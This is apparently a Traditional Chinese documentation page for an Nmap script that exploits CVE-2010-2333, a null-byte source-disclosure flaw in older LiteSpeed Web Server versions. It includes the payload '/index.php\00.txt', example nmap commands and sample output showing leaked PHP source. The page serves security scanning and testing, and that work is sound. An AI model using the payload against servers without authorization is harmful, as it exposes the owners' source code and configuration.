指令類型:portrule
類別:vuln, intrusive, exploit
下載:https://svn.nmap.org/nmap/scripts/http-litespeed-sourcecode-download.nse
Nmap Script指令摘要
Litespeed Web 伺服器漏洞利用以 null 字元污染攻擊擷取目標指令原始碼(CVE-2010-2333);此漏洞利用針對 Litespeed Web 伺服器 4.0.x 版本(4.0.15 之前版本)的 null 字元污染漏洞,透過發送帶有 null 字元後接 .txt 檔案副檔名的 HTTP 請求,來獲取目標指令的原始碼。
如果伺服器不受影響,將返回錯誤碼 400;如果找不到 index.php,您可以嘗試使用 LiteSpeed Web 伺服器提供的 /phpinfo.php,攻擊負載如下:
/index.php\00.txt
參考資料:
CVE 識別號 CVE-2010-2333:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2333
Exploit-db 連結:http://www.exploit-db.com/exploits/13850/
Nmap Script指令參數
http-litespeed-sourcecode-download.uri
這是指遠端檔案的 URI 路徑,用於下載 Litespeed Web 伺服器指令碼的原始碼。
slaxml.debug
此項是關於 slaxml 函式庫的除錯模式,用於處理 XML 資料;參考 slaxml 函式庫瞭解如何使用它來解析和處理 XML 資料。
http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent
是與 HTTP 通訊相關的參數,用於設定 HTTP 請求的不同層面,包括主機、請求主體大小、暫存存大小、通道請求等;參考 http 函式庫瞭解如何使用這些參數進行 HTTP 請求的設定。
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
這些是與 SMB(Server Message Block)身份驗證相關的參數,用於設定 SMB 連接;參考 smbauth 函式庫瞭解如何使用這些參數來設定 SMB 連接的身份驗證。
Nmap Script指令範例
nmap -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php <host>
nmap -p8088 --script http-litespeed-sourcecode-download <host>
Nmap Script指令輸出
PORT STATE SERVICE REASON
8088/tcp open radan-http syn-ack
| http-litespeed-sourcecode-download.nse: /phpinfo.php source code:
| <HTML>
| <BODY>
| <?php phpinfo() ?>
| </BODY>
|_</HTML>
Nmap Script作者:
Paulino Calderon
License: Same as Nmap--See https://nmap.org/book/man-legal.html